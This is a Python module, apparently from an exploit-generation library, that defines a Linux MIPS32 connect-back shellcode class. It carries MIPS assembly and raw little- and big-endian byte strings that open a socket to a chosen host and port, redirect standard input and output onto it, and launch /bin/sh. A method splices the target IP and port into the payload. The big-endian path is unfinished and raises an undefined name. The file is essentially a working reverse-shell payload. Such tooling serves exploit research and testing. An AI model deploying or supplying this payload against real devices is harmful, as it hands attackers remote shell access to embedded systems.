import ipaddress
import socket
import struct

from archinfo import Endness

from ..shellcode import Shellcode
from ..utils import convert_arch

class LinuxMIPS32Connectback (Shellcode):
    os = ["unix"]
    arches = ["mipsel", "mipsbe"]
    name = "connectback"

    asm = """
/* Need IP and port to exploit */

/* open new socket */
    /* call socket(2, SOCK_STREAM (2), 0) */
    li $t9, ~2
    not $a0, $t9
    slti $a2, $zero, 0xFFFF /* $a2 = 0 */
    ori $v0, $zero, SYS_socket
    sw $a0, -4($sp) /* mov $a1, $a0 */
    lw $a1, -4($sp)
    syscall 0x40404

/* save opened socket */
    sw $v0, -4($sp) /* mov $s0, $v0 */
    lw $s0, -4($sp)

/* push sockaddr, connect() */
    /* Keeping the next line of bullshit that pwntools generates, man this is bad.
    /* push '\x00\x02\x1f\x90\x7f\x00\x00\x01' */
    /* what we actually want to do is push '\x90\x1f\x00\x02\x01\x00\x00\x7f' /*
    li $t9, ~0x901f0002
    not $t1, $t9
    sw $t1, -8($sp)
    li $t9, ~0x0100007f
    not $t1, $t9
    sw $t1, -4($sp)
    addiu $sp, $sp, -8
    /* call connect('$s0', '$sp', 0x10) */
    sw $s0, -4($sp) /* mov $a0, $s0 */
    lw $a0, -4($sp)
    add $a1, $sp, $0 /* mov $a1, $sp */
    li $t9, ~0x10
    not $a2, $t9
    ori $v0, $zero, SYS_connect
    syscall 0x40404

/* Socket that is maybe connected is in $s0 */
    sw $s0, -4($sp) /* mov $a0, $s0 */
    lw $a0, -4($sp)

/* call dup2(7,[0,1,2]) */
    li $t9, ~2
    not $a1, $t9
start:
    ori $v0, $zero, SYS_dup2
    syscall 0x40404
    addi $a1, $a1, -1
    bgez $a1, start
    add $t9, $t9, $zero /* nop */

    /* execve(path='//bin/sh', argv=['sh'], envp={}) */
    /* push '//bin/sh\x00' */
    li $t1, 0x69622f2f
    sw $t1, -12($sp)
    li $t1, 0x68732f6e
    sw $t1, -8($sp)
    sw $zero, -4($sp)
    addiu $sp, $sp, -12
    add $a0, $sp, $0 /* mov $a0, $sp */
    /* push argument array [] */
    /* push '\x00' */
    sw $zero, -4($sp)
    addiu $sp, $sp, -4
    slti $a2, $zero, 0xFFFF /* $a2 = 0 */
    sw $a2, -4($sp)
    addi $sp, $sp, -4 /* null terminate */
    add $a2, $sp, $0 /* mov $a2, $sp */
    /* push argument array ['sh\x00'] */
    /* push 'sh\x00\x00' */
    ori $t1, $zero, 26739
    sw $t1, -4($sp)
    addiu $sp, $sp, -4
    slti $a1, $zero, 0xFFFF /* $a1 = 0 */
    sw $a1, -4($sp)
    addi $sp, $sp, -4 /* null terminate */
    li $t9, ~4
    not $a1, $t9
    add $a1, $sp, $zero
    sw $a1, -4($sp)
    addi $sp, $sp, -4 /* 'sh\x00' */
    add $a1, $sp, $0 /* mov $a1, $sp */
    /* setregs noop */
    /* call execve() */
    ori $v0, $zero, SYS_execve
    syscall 0x40404
"""
    
    code_le = (b"\xfd\xff\x19$'  \x03\xff\xff\x06(W\x10\x024\xfc\xff\xa4\xaf\xfc\xff\xa5\x8f\x0c\x01\x01\x01\xfc\xff\xa2\xaf\xfc\xff\xb0\x8f" +
               b"%s" + # Port
               b"\x19<\xfd\xff97'H \x03\xf8\xff\xa9\xaf" +
               b"%s" + # lower IP
               b"\x19<" +
               b"%s" + # higher IP
               b"97'H \x03\xfc\xff\xa9\xaf\xf8\xff\xbd'\xfc\xff\xb0\xaf\xfc\xff\xa4\x8f (\xa0\x03\xef\xff\x19$'0 \x03J\x10\x024\x0c\x01\x01\x01\xfc\xff\xb0\xaf\xfc\xff\xa4\x8f\xfd\xff\x19$'( \x03\xdf\x0f\x024\x0c\x01\x01\x01\xff\xff\xa5 \xfc\xff\xa1\x04 \xc8 \x03bi\t<//)5\xf4\xff\xa9\xafsh\t<n/)5\xf8\xff\xa9\xaf\xfc\xff\xa0\xaf\xf4\xff\xbd'  \xa0\x03\xfc\xff\xa0\xaf\xfc\xff\xbd'\xff\xff\x06(\xfc\xff\xa6\xaf\xfc\xff\xbd# 0\xa0\x03sh\t4\xfc\xff\xa9\xaf\xfc\xff\xbd'\xff\xff\x05(\xfc\xff\xa5\xaf\xfc\xff\xbd#\xfb\xff\x19$'( \x03 (\xa0\x03\xfc\xff\xa5\xaf\xfc\xff\xbd# (\xa0\x03\xab\x0f\x024\x0c\x01\x01\x01"
               )

    
    code_be = (b"$\x19" +
               b"%s" +
               b"\x03  '$\x19\xff\xfd\x03 ('4\x02\x0f\xdf\x01\x01\x01\x0c \xa5\xff\xff\x04\xa1\xff\xfc\x03 \xc8 <\tib5)//\xaf\xa9\xff\xf4<\ths5)/n\xaf\xa9\xff\xf8\xaf\xa0\xff\xfc'\xbd\xff\xf4\x03\xa0  \xaf\xa0\xff\xfc'\xbd\xff\xfc(\x06\xff\xff\xaf\xa6\xff\xfc#\xbd\xff\xfc\x03\xa00 4\ths\xaf\xa9\xff\xfc'\xbd\xff\xfc(\x05\xff\xff\xaf\xa5\xff\xfc#\xbd\xff\xfc$\x19\xff\xfb\x03 ('\x03\xa0( \xaf\xa5\xff\xfc#\xbd\xff\xfc\x03\xa0( 4\x02\x0f\xab\x01\x01\x01\x0c")

    def __init__(self, host, port):
        self.host = host

        self.port = port

        if self.port < 0 or self.port >= 0xffff:
            raise ValueError("invalid port specified")

    def raw(self, arch=None):
        if not arch:
            raise ValueError("Architecture must be specified.")

        the_arch = convert_arch(arch)

        if the_arch.name != "MIPS32":
            raise TypeError("%s only supports MIPS32." % str(self.__class__))

        packed_port = struct.pack('>H', (~self.port) & 0xffff)

        target_ip = socket.gethostbyname(self.host)
        ip = ipaddress.ip_address(target_ip)
        ip_for_shellcode = (~int(ip)) & 0xffffffff

        ip_to_send = struct.pack('>I', ip_for_shellcode)
        lower_ip = ip_to_send[:2]
        higher_ip = ip_to_send[2:]

        if the_arch.memory_endness == Endness.LE:
            return self.code_le % (packed_port, higher_ip, lower_ip)
        else:
            raise NOTIMPLEMENTEDYET()


